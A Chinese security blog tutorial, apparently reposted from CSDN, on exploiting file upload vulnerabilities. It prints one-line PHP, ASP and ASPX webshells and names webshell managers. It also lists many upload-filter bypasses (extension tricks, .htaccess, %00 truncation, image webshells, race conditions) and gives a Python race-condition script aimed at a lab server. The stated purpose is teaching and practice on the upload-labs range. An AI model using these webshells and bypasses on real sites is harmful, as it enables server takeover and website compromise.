目录
一、了解文件上传漏洞是什么
二、漏洞利用方法
三、了解并接触常见的webshell管理工具,以及下载
四、一句话木马
五、文件上传的风险存在地方
七、靶场练习,巩固知识
一、了解文件上传漏洞是什么
由于程序员在对用户文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。
二、利用方法
如果程序里面存在这种漏洞,那么恶意攻击者可以直接向你的服务器上传一个 webshell( 又称 ASP 木马、PHP 木马、JAVA木马等即利用服务器端的文件操作语句写成的动态网页,可以用来编辑你服务器上的文件 ),从而控制你的网站。
流程:判断存在漏洞,再判断网站的开发语言,尝试上传文件绕过waf,进行尝试链接,利用前端或者抓包方式查看返回的路径(如果绝对路径直接访问,相对路径按经验进行URl地址拼接)。
WebShell , 简称网页后门。简单来说它是运行在Web应用之上的远程控制程序。
三、了解并接触常见的webshell管理工具
当上传木马文件后,可用使用webshell管理工具进行连接,执行想要的操作命令。
我自己使用的是中国蚁剑,可能用的比较舒服,下载的话,在csdn上面搜下载流程就可以啦。
中国蚁剑 中国菜刀 冰蝎
四、一句话木马
木马就是我们需要想办法上传到对方服务器并运行的恶意代码,不理解可以继续往下看
php的一句话木马:
<?php @eval($_POST[‘pass‘]);?>
asp的一句话是:
<%eval request (“pass“)%>
aspx的一句话是:
<%@ Page Language=”Jscript”%> <%eval(Request.Item[“pass“],”unsafe”);%>
还有好多木马,可以自己查找收集哦
上面的标红的pass是你链接你这个木马的密码,也可以设置成自己想要的密码。
一句话木马+webshell工具通常是一起使用的,先上传让服务器解析你的恶意代码,然后用webshell连接即可。
五、文件上传的风险存在地方
- 上传图片的地方,比如说头像,博客
- 评价订单的时候
- 能够上传文件的地方
要有时常判断的眼光进行判断
六、文件上传绕过
文件上传通常会被审查判断是否为恶意文件,我们可以利用各种绕过方式来进行,绕过审查,进行上传我们的文件木马。
常见的绕过方式
- 前端js检测
可以通过,burp进行截取中间段数据改数据包后缀,然后进行绕过。
- 后端mime校验
也可以通过前端js检测的方法进行绕过
3.命名规则绕过
对于php文件尾过滤,可以采用phtml,php3,php5,phps等等,也可以采用大小写绕过,对于文件尾过滤过于严谨的可以尝试上传.htaccess文件
4末尾空格绕过
对于windows来讲会自动去除文件尾后边的空格,但是对于服务器来讲如果没有trim($file_ext); 首尾去空的函数,则可以在文件尾后面添加一个空格,比如对’.php’过滤,则不会匹配’.php ‘结尾的文件,服务器仍然会正常解析
末尾.绕过
对于windows来讲会自动去除文件末尾后面的.,但是对于服务器来讲如果没有deldot($file_name);删除文件名末尾的点函数,则可以在文件名后面添加一个.,对于’.php’过滤,则不会过滤掉’.php.’文件
末尾大小写绕过
如果在检测中没有 strtolower()函数,说明不存在大小写过滤,因此可以考虑大小写绕过
文件末尾添加::$DATA绕过
在window的时候如果文件名+”::$DATA”会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名
例如:”phpinfo.php::$DATA”Windows会自动去掉末尾的::$DATA变成”phpinfo.php”
双写绕过
有些正则表达式会过滤一些字符,但是只会过滤一次,所以我们写两次,等他过滤完,即可剩下一个后缀名,来成功绕过。
或者某些函数去除.和空格只去除一次,可以进行多写几个空格和点.绕过
如.pphphp,从左往右匹配到第一个php时去掉变为.php,达到了绕过的目的
.htaccess绕过
htaccess是apache的特有文件,负责相关目录下的网页配置。可以改变文件解析规则,比如将图片文件解析成php文件 而上传一张携带webshell的图片文件,就可以成功链接。
但需要先上传.htaccess文件,然后再上传webshell文件。
apache解析漏洞
六、文件上传绕过阿帕奇一般都是从右向左,先解析最后的后缀,然后再往前面进行识别。
上传图片马:1.jpg
抓包工具修改马名称为:1.php.1616asda
先看1616asda,绕过,然后才会解析到php
%00截断
%00绕过主要是针对于白名绕过
原理:白名单过滤肯定是从后往前读取后缀,所以读取到.jpg在白名单里就放通了。
但是在调用文件的时候读取文件名是从前往后读,所以看到.php后面的终止符的时候就停止读取了,最终读取的文件名的后缀就是.php
%00是URl编码,只针对get传参,所以不适用与post传输文件地址
图片内容属性检测绕过
对于一些查看文件属性的机制,我们可以制作图片马进行绕过
图片马本质是在正常图片后缀加上敏感木马,进行执行。
copy 1.png/b+2.php 3.png (windos可以利用这个命令制作图片马,正常图片+一句话木马)
ps:图片马一般不会自动执行,需要配合文件包含漏洞进行利用
文件包含漏洞我后面会进行更新,感兴趣可以去我主页了解哦
图片二次渲染绕过
有时候服务器会对上传上去的图片进行二次渲染,生成一张新的图片,从而过滤掉webshell脚本,这时只需要将渲染后的图片与渲染前的图片进行对比,查看二者相同的地方,也就是渲染未改动的地方,在此处插入webshell脚本即可,网上推荐用gif图片
条件竞争
条件竞争实际上就是服务器会校验你上传的文件是否合法,不合法将其进行删除,但是服务器对文件处理速度有限,只要上传速度大于他删除速度,那我们就可以读取到我们的木马文件并且执行。
我们需要一边用python进行请求读取你的恶意文件(需要判断你文件生成的地址)
一遍需要用burp来进行不断的上传文件,直到python读取到了恶意文件存在服务器上,即可利用webshell进行链接。
ps:上传的文件不能直接是木马,是一个能生成木马的文件
之前写的竞争文件的python脚本可以参考
import requests
def main():
i=0
while 1:
try:
print(i,end='r')
a=requests.get("http://172.20.10.3:88/upload/jinzhen.php")
if "c4ca4238a0b923820dcc509a6f75849b" in a.text:
print("OK")
break
except Exception as e:
pass
i+=1
if __name__=='__main__':
main()
当时用的恶意文件也可以参考
七、靶场练习,巩固知识
纸上得来终觉浅,绝知此事要躬行
—–陆游
我们到现在以及有了文件上传漏洞的基本的概念以及绕过方式的了解,但这个时候一定要多多练习巩固知识,我们可以利用靶场来进行练习积累经验
小吴这里推荐文件上传靶场:upload-labs(下面附带靶场下载链接,可以搜索别的博主下载教程哦)
靶场下载地址:GitHub – c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场
有不懂的知识可以评论私信交流
感谢您看到这里,希望这篇文章对您在网络安全这条道路上有所帮助,再次感谢。
小吴
原文地址:https://blog.csdn.net/m0_73033023/article/details/130258845
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_50837.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!